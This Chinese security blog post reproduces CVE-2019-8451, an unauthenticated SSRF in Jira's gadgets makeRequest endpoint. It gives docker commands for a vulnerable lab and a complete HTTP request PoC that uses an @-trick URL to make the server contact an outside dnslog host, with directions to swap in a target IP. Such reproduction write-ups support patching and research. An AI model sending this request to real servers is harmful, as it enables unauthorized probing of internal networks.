前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2019-8451:Jira未授权SSRF漏洞复现

CVE-2019-8451:Jira未授权SSRF漏洞复现

作者头像
用户1631416
发布2019-10-09 09:52:56
3.5K0
发布2019-10-09 09:52:56
举报
文章被收录于专栏:玄魂工作室

0x00 简介


JIRA是Atlassian公司出品的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。

0x01 漏洞概述


Jira的/plugins/servlet/gadgets/makeRequest资源存在SSRF漏洞,原因在于JiraWhitelist这个类的逻辑缺陷,成功利用此漏洞的远程攻击者可以以Jira服务端的身份访问内网资源。经分析,此漏洞无需任何凭据即可触发。(来自奇安信CERT)

0x02 影响范围


Jira < 8.4.0

0x03 环境搭建


在线靶场

开放时间(当前-9月29日20:00)

获取方式(完成任意一个):

1、将本文转发至朋友圈并配文字,截图发至公众号内

2、联系作者,五元红包

自行搭建

使用docker进行搭建,执行以下命令开启环境

代码语言:javascript
复制
docker pull cptactionhank/atlassian-jira:7.8.0
代码语言:javascript
复制
docker run --detach --publish 8080:8080 cptactionhank/atlassian-jira:7.8.0

访问ip:8080进行安装

下图选择第二个

继续即可

点击next,后面漏了两张图

去生成JIRA使用许可证

生成之后找到License Key,回到页面填上License Key继续安装

至此,安装完毕。

0x04 漏洞利用


先访问ip:8080,然后刷新抓包

将数据包替换为如下Poc:

代码语言:javascript
复制
GET /plugins/servlet/gadgets/makeRequest?url=http://192.168.198.133:8080@bgkwd5.dnslog.cn HTTP/1.1
Host: 192.168.198.133:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.198.133:8080/secure/Dashboard.jspa
X-Atlassian-Token: no-check
Content-Length: 2

其中ip替换为目标ip,共三处

@后面改为你的dnslog的地址

repeater发包

去dnslog中刷新查看结果,可以看到有流量经过

如果访问未开放端口,结果是这样的:

参考链接:

https://mp.weixin.qq.com/s/_Tsq9p1pQyszJt2VaXd61A

https://www.cnblogs.com/houchaoying/p/9096118.html(安装过程)

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-09-29,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 玄魂工作室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
容器服务
腾讯云容器服务(Tencent Kubernetes Engine, TKE)基于原生 kubernetes 提供以容器为核心的、高度可扩展的高性能容器管理服务,覆盖 Serverless、边缘计算、分布式云等多种业务部署场景,业内首创单个集群兼容多种计算节点的容器资源管理模式。同时产品作为云原生 Finops 领先布道者,主导开源项目Crane,全面助力客户实现资源优化、成本控制。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档